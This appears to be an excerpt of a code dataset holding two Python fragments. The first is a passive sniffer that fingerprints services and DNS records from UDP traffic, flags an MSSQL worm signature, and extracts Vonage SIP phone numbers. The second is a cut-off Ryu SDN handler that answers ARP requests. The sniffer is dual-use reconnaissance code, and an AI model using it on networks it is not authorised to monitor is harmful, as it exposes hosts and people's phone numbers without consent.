\"spamd/spamc\")\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t#LogNewPayload(ClientPayloadDir, ClientKey, Payload)\n\t\t\t\telse:\t#Neither port pair is known as a server\n\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t#Following is debugging at best; it should only show up early on as the sniffer listens to conversations for which it didn't hear the SYN/ACK\n\t\t\t\t\t#print \"note: neither \" + FromPort + \" nor \" + ToPort + \" is listed as a live service.\"\n\t\t\telse:\t#Other TCP flag combinations here\n\t\t\t\tUnhandledPacket(p)\n\t\telif p['IP'].proto == 17 and (type(p['UDP']) == UDP):\t\t#UDP. We have to check the object type as well as we do get (corrupted? truncated?) packets with type 17 that aren't udp: AttributeError: 'NoneType' object has no attribute 'sport'\n\t\t\t#FIXME - possibly run udp packets through ServiceFPs as well?\n\t\t\tsport=str(p['UDP'].sport)\n\t\t\tdport=str(p['UDP'].dport)\n\t\t\tSrcService = sIP + \",UDP_\" + sport\n\t\t\tDstService = dIP + \",UDP_\" + dport\n\t\t\tSrcClient = sIP + \",UDP_\" + dport\n\t\t\tPayload = p['Raw.load']\n\n\t\t\t#Multicast DNS: http://files.multicastdns.org/draft-cheshire-dnsext-multicastdns.txt\n\t\t\t#- usually sent to 224.0.0.251 (or FF02::FB) (link-local multicast).\n\t\t\t#\t- if \".local.\" in query, these MUST be the target IPs\n\t\t\t#\t- non-local queries may be sent to these or normal dns servers\n\t\t\t#\t- rdns queries for \"254.169.in-addr.arpa.\" MUST be sent to 224.0.0.251\n\t\t\t#\t- rdns queries for \"8.e.f.ip6.arpa.\", \"9.e.f.ip6.arpa.\",\"a.e.f.ip6.arpa.\", and \"b.e.f.ip6.arpa.\" MUST be sent to the IPv6 mDNS link-local multicast address FF02::FB.\n\t\t\t#- sent to udp port 5353\n\t\t\t#- generic clients may use \"single-dns-object.local.\", such as \"sparrow.local.\"\n\t\t\t#- responses have IP TTL = 255 to check that packet originated on-lan\n\n\t\t\t#Multicast DNS, placed next to normal dns, out of numerical order\n\t\t\tif (dport == \"5353\") and ( (p['IP'].ttl == 1) or (p['IP'].ttl == 255) ):\n\t\t\t\tif ((not LiveUDPService.has_key(SrcClient)) or (LiveUDPService[SrcClient] == False)):\n\t\t\t\t\tLiveUDPService[SrcClient] = True\n\t\t\t\t\tif (dIP == \"224.0.0.251\"):\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"mdns/broadcastclient\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"mdns/client\")\n\n\t\t\t\t\t#Extract dns answers like with 53; change elif to if and add 5353 to ports on next if?\n\t\t\t\t\t#At the moment, no; scapy does not appear to parse 5353 as dns.\n\t\t\t\t\t#else:\n\t\t\t\t\t#\tUnhandledPacket(p)\n\t\t\t#FIXME - add check for \"if isinstance(p['DNS'], whatevertype):\there and at all p[] accesses.\n\t\t\telif (sport == \"53\") and (isinstance(p['DNS'], DNS)) and (p['DNS'].qr == 1):\t\t#qr == 1 is a response\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\t#FIXME - Also report the TLD from one of the query answers to show what it's willing to answer for?\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"dns/server\")\n\t\t\t\t#Now we extract dns answers. First, check that there's no dns error:\n\t\t\t\tif (p['DNS'].rcode == 0):\t\t\t#No error\n\t\t\t\t\tDNSBlocks = [ ]\n\t\t\t\t\tCNAMERecs = [ ]\t\t\t\t#We hold onto all cnames until we've processed all PTR's and A's here\n\t\t\t\t\tif (p['DNS'].ancount > 0):\t\t#If we have at least one answer from the answer block, process it\n\t\t\t\t\t\tDNSBlocks.append(p[DNS].an)\n\t\t\t\t\tif (p['DNS'].arcount > 0):\t\t#Likewise for the \"additional\" block\n\t\t\t\t\t\tDNSBlocks.append(p[DNS].ar)\n\t\t\t\t\tfor OneAn in DNSBlocks:\n\t\t\t\t\t\t#Thanks to Philippe Biondi for showing me how to extract additional records.\n\t\t\t\t\t\t#Debug(\"Start dns extract\" + str(p['DNS'].ancount))\n\t\t\t\t\t\t#OneAn = p[DNS].an\n\t\t\t\t\t\t#while OneAn is not NoPayload:\t\t#This doesn't seem to stop at the end of the list; incorrect syntax.\n\t\t\t\t\t\twhile isinstance(OneAn,DNSRR):\t\t#Somewhat equivalent:\twhile not isinstance(an, NoPayload):\n\t\t\t\t\t\t\n\t\t\t\t\t\t\t#print \"Type: \" + str(type(OneAn))\t\t#All of type scapy.DNSRR\n\t\t\t\t\t\t\tif (OneAn.rclass == 1) and (OneAn.type == 1):\t\t#\"IN\" class and \"A\" type answer\n\t\t\t\t\t\t\t\tDNSIPAddr = OneAn.rdata\n\t\t\t\t\t\t\t\tDNSHostname = OneAn.rrname.lower()\n\t\t\t\t\t\t\t\t#Check new hostname to see if it's in the list.\n\t\t\t\t\t\t\t\tif (not DNSRecord.has_key(DNSIPAddr + \",A\")) or (not(DNSHostname in DNSRecord[DNSIPAddr + \",A\"])):\n\t\t\t\t\t\t\t\t\tReportId(\"DN\", DNSIPAddr, \"A\", DNSHostname, \"\")\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 2):\t\t\t#\"IN\" class and \"NS\" answer\n\t\t\t\t\t\t\t\tpass\t\t\t\t\t\t\t#Perhaps later\n\t\t\t\t\t\t\t\t#Like cnames, this is object -> nameserver hostname, so these would need to be queued like cnames until we're done with A's and PTR's.\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 5):\t\t\t#\"IN\" class and \"CNAME\" answer\n\t\t\t\t\t\t\t\tCNAMERecs.append(OneAn)\t\t\t\t\t#Remember the record; we'll process these after the PTR's and A's\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 6):\t\t\t#\"IN\" class and \"SOA\" answer\n\t\t\t\t\t\t\t\tpass\t\t\t\t\t\t\t#Not immediately useful, perhaps later\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 12):\t\t#\"IN\" class and \"PTR\" type answer\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#For input of '182.111.59.66.in-addr.arpa.' :\n\t\t\t\t\t\t\t\tDNSIPAddr = OneAn.rrname.replace(\".in-addr.arpa.\", \"\")\t\t# '182.111.59.66'\n\t\t\t\t\t\t\t\tDNSIPAddr = DNSIPAddr.split('.')\t\t\t\t# ['182', '111', '59', '66']\n\t\t\t\t\t\t\t\tDNSIPAddr.reverse()\t\t\t\t\t\t# ['66', '59', '111', '182']\n\t\t\t\t\t\t\t\tDNSIPAddr = string.join(DNSIPAddr, '.')\t\t\t\t# '66.59.111.182'\n\t\t\t\t\t\t\t\t#Check that we end up with a legal IPv4 address before continuing; we're getting garbage.\n\t\t\t\t\t\t\t\tif (re.search('^[1-9][0-9\\.]*[0-9]$', DNSIPAddr) == None):\n\t\t\t\t\t\t\t\t\tDebug(\"Odd PTR rrname: \" + OneAn.rrname)\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tDNSHostname = OneAn.rdata.lower()\n\t\t\t\t\t\t\t\t\tif (not DNSRecord.has_key(DNSIPAddr + \",PTR\")) or (not(DNSHostname in DNSRecord[DNSIPAddr + \",PTR\"])):\n\t\t\t\t\t\t\t\t\t\tReportId(\"DN\", DNSIPAddr, \"PTR\", DNSHostname, \"\")\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 15):\t\t#\"IN\" class and \"MX\" answer\n\t\t\t\t\t\t\t\tpass\t\t\t\t\t\t\t#Possibly later\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 28):\t\t#\"IN\" class and \"AAAA\" answer\n\t\t\t\t\t\t\t\tDNSIPAddr = OneAn.rdata.upper()\n\t\t\t\t\t\t\t\tDNSHostname = OneAn.rrname.lower()\n\t\t\t\t\t\t\t\tif (not DNSRecord.has_key(DNSIPAddr + \",AAAA\")) or (not(DNSHostname in DNSRecord[DNSIPAddr + \",AAAA\"])):\n\t\t\t\t\t\t\t\t\tReportId(\"DN\", DNSIPAddr, \"AAAA\", DNSHostname, \"\")\n\n\t\t\t\t\t\t\t#Move to the next DNS object in the \"an\" block\n\t\t\t\t\t\t\tOneAn = OneAn.payload\n\t\t\t\t\tfor OneCNAME in CNAMERecs:\t\t#Now that we have all A/PTR's, go back and turn cname records into pseudo-A's\n\t\t\t\t\t\tif isinstance(OneCNAME,DNSRR):\n\t\t\t\t\t\t\tAlias = OneCNAME.rrname.lower()\n\t\t\t\t\t\t\tExisting = OneCNAME.rdata.lower()\n\t\t\t\t\t\t\tif isFQDN(Alias) and isFQDN(Existing):\n\t\t\t\t\t\t\t\tif HostIPs.has_key(Existing):\n\t\t\t\t\t\t\t\t\tfor OneIP in HostIPs[Existing]:\t\t\t\t#Loop through each of the IPs for the canonical name, and\n\t\t\t\t\t\t\t\t\t\tif (not DNSRecord.has_key(OneIP + \",CNAME\")) or (not(Alias in DNSRecord[OneIP + \",CNAME\"])):\n\t\t\t\t\t\t\t\t\t\t\tReportId(\"DN\", OneIP, \"CNAME\", Alias, \"\")\t#report them as kind-of A records for the Alias.\n\t\t\t\t\t\t\t\t#If we don't have a A/PTR record for \"Existing\", just ignore it. Hopefully we'll get the Existing A/PTR in the next few answers, and will re-ask for the CNAME later, at which point we'll get a full cname record.\n\t\t\t\t\t\t\t\t#else:\n\t\t\t\t\t\t\t\t#\tDebug(\"CNAME \" + Alias + \" -> \" + Existing + \" requested, but no IP's for the latter, skipping.\")\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tDebug(\"One of \" + Alias + \" and \" + Existing + \" isn't an FQDN, skipping cname processing.\")\n\t\t\t\telif (p['DNS'].rcode == 1):\t\t\t#FormErr: server responding to an improperly formatted request\n\t\t\t\t\tpass\n\t\t\t\telif (p['DNS'].rcode == 2):\t\t\t#ServFail: domain exists, root nameservers list authoritative name servers, but authNS's won't answer queries\n\t\t\t\t\tpass\n\t\t\t\telif (p['DNS'].rcode == 3):\t\t\t#NXDOMAIN: root nameservers don't have any listing (domain doesn't exist or is on hold)\n\t\t\t\t\tpass\n\t\t\t\telif (p['DNS'].rcode == 5):\t\t\t#Query refused\n\t\t\t\t\tpass\n\t\t\t\telse:\t#rcode indicates an error\n\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (dport == \"53\") and (type(p['DNS']) == DNS) and (p['DNS'].qr == 0):\t#dns query\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"dns/client\")\n\t\t\telif (sport == \"67\") and (dport == \"68\"):\t\t#Bootp/dhcp server talking to client\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"bootpordhcp/server\")\n\t\t\telif (sport == \"68\") and (dport == \"67\"):\t\t#Bootp/dhcp client talking to server\n\t\t\t\tif (sIP != \"0.0.0.0\"):\t\t\t\t#If the client is simply renewing an IP, remember it.\n\t\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"bootpordhcp/client\")\n\t\t\t\t#else:\t\t\t\t\t\t#If you want to record which macs are asking for addresses, do it here.\n\t\t\t\t#\tpass\n\t\t\telif (sport == \"123\") and (dport == \"123\") and (p['NTP'].stratum != ''):\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"ntp/generic\")\n\t\t\telif (dport == \"123\") and ( (dIP == \"216.115.23.75\") or (dIP == \"216.115.23.76\") or (dIP == \"69.59.240.75\") ):\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"ntp/vonageclient\")\n\t\t\telif (sport == \"123\") and ( (sIP == \"216.115.23.75\") or (sIP == \"216.115.23.76\") or (sIP == \"69.59.240.75\") ):\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"ntp/vonageserver\")\n\t\t\telif (dport == \"137\"):\t\t\t#netbios-ns\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (p['Ethernet'].dst.upper() == \"FF:FF:FF:FF:FF:FF\"):\t\t\t#broadcast\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"netbios-ns/broadcastclient\")\n\t\t\t\t\telif (Payload != None) and (Payload.find('CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA') > -1):\t#wildcard\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"netbios-ns/wildcardclient\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"netbios-ns/unicastclient\")\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"500\") and (dport == \"500\") and (p['ISAKMP'].init_cookie != ''):\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"isakmp/generic\")\n\t\t\telif (dport == \"512\"):\t\t\t#BIFF\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('@') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"biff/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif ( (dport == \"1026\") or (dport == \"1027\") or (dport == \"1028\") ):\t#winpopup spam client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and ( (Payload.find('Download Registry Update from:') > -1) or (Payload.find('CRITICAL ERROR MESSAGE! - REGISTRY DAMAGED AND CORRUPTED.') > -1) or (Payload.find('Your system registry is corrupted and needs to be cleaned immediately.') > -1) or (Payload.find('CRITICAL SYSTEM ERRORS') > -1) ):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"winpopup/spamclient\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (dport == \"1434\"):\t\t#Probable mssql attack\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('Qh.dll') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"mssql/clientattack\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"1900\") and (dport == \"1900\") and (dIP == \"239.255.255.250\"):\t\t#SSDP\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('NOTIFY') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"ssdp/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (dport == \"3865\") and (dIP == \"255.255.255.255\"):\t\t#XPL, http://wiki.xplproject.org.uk/index.php/Main_Page\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"xpl/client\")\n\t\t\telif (sport == \"5061\") and (dport == \"5061\") and ( (dIP == \"216.115.30.28\") or (dIP == \"69.59.227.77\") or (dIP == \"69.59.232.33\") or (dIP == \"69.59.240.84\") ):\t\t#Vonage SIP client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('.vonage.net:5061 SIP/2.0') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tSipMatch = SipPhoneMatch.search(Payload)\n\t\t\t\t\t\tif (SipMatch != None) and (len(SipMatch.groups()) >= 1):\n\t\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"sip/vonage_client, phone number: \" + SipMatch.group(1))\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"sip/vonage_client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"5061\") and (dport == \"5061\") and ( (sIP == \"216.115.30.28\") or (sIP == \"69.59.227.77\") or (sIP == \"69.59.232.33\") or (sIP == \"69.59.240.84\") ):\t#Vonage SIP server\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('.vonage.net:5061>') > -1):\n\t\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"sip/vonage_server\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"6515\") and (dport == \"6514\") and (dIP == \"255.255.255.255\"):\t\t#mcafee ASaP broadcast, looking for a proxy out. http://www.myasap.de/intl/EN/content/virusscan_asap/faq_new.asp\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('<rumor version=') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"asap/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif ( (sport == \"9052\") or (sport == \"9053\") or (sport == \"9054\") ) and ( (sIP == \"205.188.146.72\") or (sIP == \"205.188.157.241\") or (sIP == \"205.188.157.242\") or (sIP == \"205.188.157.243\") or (sIP == \"205.188.157.244\") or (sIP == \"64.12.51.145\") or (sIP == \"64.12.51.148\") or (sIP == \"149.174.54.131\") ):\t#Possibly AOL dns response\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('dns-01') > -1):\n\t\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"aoldns/server\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"27005\") and ( (dport == \"27016\") or (dport == \"27017\") ):\t\t\t\t#Halflife client live game\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"halflife/client\")\n\t\t\telif (dport == \"27013\") and (dIP == \"207.173.177.12\"):\t\t\t\t#variable payload, so can't (Payload != None) and (Payload.find('Steam.exe') > -1)\t\t\t\t#Halflife client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"halflife/client\")\n\t\t\telif (sport == \"27013\") and (sIP == \"207.173.177.12\"):\t\t\t\t\t\t\t#halflife server\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"halflife/server\")\n\t\t\telif ( (sport == \"27016\") or (sport == \"27017\") ) and (dport == \"27005\"):\t\t\t\t#halflife server live game\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"halflife/server\")\n\t\t\telif ( (dport == \"27015\") or (dport == \"27016\") or (dport == \"27025\") or (dport == \"27026\") ):\t\t#Variable payload, so can't: (Payload != None) and (Payload.find('basic') > -1)\t#Halflife client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"halflife/client\")\n\t\t\telif (dport == \"27017\") and ( (dIP == \"69.28.148.250\") or (dIP == \"69.28.156.250\") or (dIP == \"72.165.61.161\") or (dIP == \"72.165.61.185\") or (dIP == \"72.165.61.186\") or (dIP == \"72.165.61.188\") or (dIP == \"68.142.64.164\") or (dIP == \"68.142.64.165\") or (dIP == \"68.142.64.166\") ):\t#Steamfriends client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('VS01') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"steamfriends/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"27017\") and ( (sIP == \"69.28.148.250\") or (sIP == \"69.28.156.250\") or (sIP == \"72.165.61.161\") or (sIP == \"72.165.61.185\") or (sIP == \"72.165.61.186\") or (sIP == \"72.165.61.188\") or (sIP == \"68.142.64.164\") or (sIP == \"68.142.64.165\") or (sIP == \"68.142.64.166\") ):\t#Steamfriends server\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('VS01') > -1):\n\t\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"steamfriends/server\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif ( (sport == \"21020\") or (sport == \"21250\") or (sport == \"27016\") or (sport == \"27017\") or (sport == \"27018\") or (sport == \"27030\") or (sport == \"27035\") or (sport == \"27040\") or (sport == \"28015\") ):\t\t\t\t\t\t\t#halflife server\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('Team Fortress') > -1):\n\t\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"halflife/server\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"27019\"):\t\t\t\t\t\t\t#halflife server\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"halflife/server\")\n\t\t\telif ( (dport == \"1265\") or (dport == \"20100\") or (dport == \"21550\") or (dport == \"27000\") or (dport == \"27017\") or (dport == \"27018\") or (dport == \"27019\") or (dport == \"27022\") or (dport == \"27030\") or (dport == \"27035\") or (dport == \"27050\") or (dport == \"27078\") or (dport == \"27080\") or (dport == \"28015\") or (dport == \"28100\") or (dport == \"45081\") ):\t\t#Halflife client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('Source Engine Query') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"halflife/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (dport == \"24441\"):\t\t\t#Pyzor\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('User:') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"pyzor/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t#FIXME - interesting issue; the ttl<5 test will catch traceroutes coming into us, but not ones we're creating to go out. Hmmm.\n\t\t\telif ( (dport >= \"33434\") and (dport <= \"33524\") ) and (p['IP'].ttl <= 5):\t#udptraceroute client\n\t\t\t\tif ((not LiveUDPClient.has_key(sIP + \"UDP_33434\")) or (LiveUDPClient[sIP + \"UDP_33434\"] == False)):\n\t\t\t\t\tLiveUDPClient[sIP + \"UDP_33434\"] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_33434\", \"open\", \"udptraceroute/client\")\n\t\t\telif (dport == \"40348\"):\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('HLS') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"halflife/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (p['IP'].frag > 0):\n\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sIP == \"207.46.51.74\") or (sIP == \"65.55.251.10\"):\t\t\t\t#Bigfish.com - dns?\n\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sIP == \"61.215.106.146\"):\t\t\t\t#junk\n\t\t\t\tUnhandledPacket(p)\n\t\t\telse:\n\t\t\t\tUnhandledPacket(p)\n\t\telse:\n\t\t\tDebug(\"Other IP protocol (\" + str(p['IP'].src) + \"->\" + str(p['IP'].dst) + \"): \" + str(p['IP'].proto))\n\t\t\tUnhandledPacket(p)\n\telif p['Ethernet'].type == 0x86DD:\t\t#IPv6\n\t\tUnhandledPacket(p)\n\telse:\n\t\tprint \"Unregistered ethernet type:\", p['Ethernet'].type\n\t\tUnhandledPacket(p)", "def _packet_in(self, ev):\n\n dp = ev.msg.datapath\n ofp = dp.ofproto\n parser = dp.ofproto_parser\n match = ev.msg.match\n\n ##SNDCP packet with multiple fragments recieved - print warning, send ICMP fragmentation needed\n ##TODO: Not WOrking correctly\n ## File \"/usr/local/lib/python2.7/dist-packages/ryu/ofproto/ofproto_v1_3_parser.py\", line 746, in __getitem__\n ## return dict(self._fields2)[key]\n ## KeyError: 'udp_dst'\n\n # if (match['eth_type'] == 0x0800 and match['ip_proto'] == inet.IPPROTO_UDP\n # and match['udp_dst'] == VGSN_PORT and match['sndcp_first_segment'] == 1\n # and match['sndcp_more_segments'] == 1):\n # _icmp_send(dp,match['in_port'],match['ipv4_dst'],match['ipv4_src'],match['eth_dst'],match['eth_src'],icmp_type=3,icmp_code=4)\n # LOG.warning('WARNING: Device with IP: '+match['ipv4_src']+' sent fragmented sndcp packet')\n # return\n\n ##ARP request recieved - send 'I'm here' response\n if match['eth_type'] == 0x0806 and match['arp_op'] == 1:\n LOG.debug(\"ARP request accepted\")\n _arp_send(dp=dp, port_out=match['in_port'], arp_code=2, eth_dst=match['eth_src'], eth_target=match['arp_sha'],\n ip_target=match['arp_spa'], ip_sender=match['arp_tpa'])\n LOG.debug('Reply to '+match['arp_spa'] +': Host '+match['arp_tpa']+' is at forwarder '+str(dp.id) + \" with ethX source MAC address\")\n return\n\n ##ARP response with target_ip==DISCOVERY_ARP_IP recieved - we found APN\n #\n # FIXED: All ARP responses are replied, regardless of the target 